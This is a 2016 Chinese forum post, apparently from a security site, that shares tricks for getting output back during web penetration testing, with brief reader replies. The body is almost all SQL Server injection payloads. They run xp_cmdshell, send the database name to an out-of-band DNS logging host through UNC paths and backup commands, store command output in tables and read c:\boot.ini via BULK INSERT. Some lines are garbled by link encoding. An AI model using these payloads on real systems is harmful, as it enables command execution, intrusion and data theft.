首页
社区
课程
招聘
[原创]WEB渗透测试中回显的一些技巧
发表于: 2016-11-7 22:57 6198

[原创]WEB渗透测试中回显的一些技巧

2016-11-7 22:57
6198
504K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Q4x3V1q4Q4x3V1q4Q4x3V1q4Q4x3V1k6Q4x3V1q4Q4x3V1q4Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6t1I4i4K6y4n7c8g2S2q4b7H3`.`. xp_cmdshell 'ping a1.***.ceye.io'
DECLARE @returnText VARCHAR(500);DECLARE @status int;DECLARE @urlStr VARCHAR(255);SET @urlStr ='2cbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3c8V1k6q4)9J5k6g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5k6h3y4W2P5h3g2Q4x3X3g2A6L8#2)9J5c8X3q4Q4x3U0N6Q4x3@1u0q4h3p5g2o6 P_GET_HttpRequestData  @urlStr, @status OUTPUT, @returnText   OUTPUT; 
f38K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Q4x3V1q4Q4x3V1q4Q4x3V1q4Q4x3V1k6Q4x3V1q4Q4x3V1q4Q4x3X3g2H3K9s2m8Q4x3@1k6A6k6q4)9K6c8o6t1I4i4K6y4n7k6r3g2U0L8r3q4J5k6b7`.`. @@hp varchar(800);set @@hp=db_name(0);exec('exec xp_cmdshell ''\\'%2b@@hp%2b'.***.ceye.io\a.exe'''); 
先执行create database rain;然后:
declare @@hp varchar(800);set @@hp = db_name();exec('backup log [rain] to disk=''\\'+@@hp+'. ***.ceye.io\a.exe'';');-- //+记得编码
create table test(t1 nvarchar(255), id int);DECLARE @result varchar(255);EXEC xp_cmdshell 'ping mytest1.***.ceye.io',@result output;insert into test(t1) values(@result);
再查询结果and 1=(select top 1 t1 from test) 或者and 1=(select count(*) from test where t1>1)
;drop table cmd;create table cmd (a text);BULK INSERT cmd FROM 'c:\boot.ini' WITH (FIELDTERMINATOR = '\n',ROWTERMINATOR ='\n\n') 

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (7)
雪    币: 200
活跃值: (928)
能力值: ( LV12,RANK:530 )
在线值:
发帖
回帖
粉丝
2
厉害,学习了
2016-11-7 23:07
0
雪    币: 2955
活跃值: (562)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
学习了。呵呵
2016-11-8 08:41
0
雪    币: 2841
活跃值: (1125)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
学习了,
2016-11-8 17:06
0
雪    币: 6
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
火速围观神贴
2016-11-12 23:52
0
雪    币: 38
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
这个好,可以学习
2017-2-13 08:27
0
游客
登录 | 注册 方可回帖
返回